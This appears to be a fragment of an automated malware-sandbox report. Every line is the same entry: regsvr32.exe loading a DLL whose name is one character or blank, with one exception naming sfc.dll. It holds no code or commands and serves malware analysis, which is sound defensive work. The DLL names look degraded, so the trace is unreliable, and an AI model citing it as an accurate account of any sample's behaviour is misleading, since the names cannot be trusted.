            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
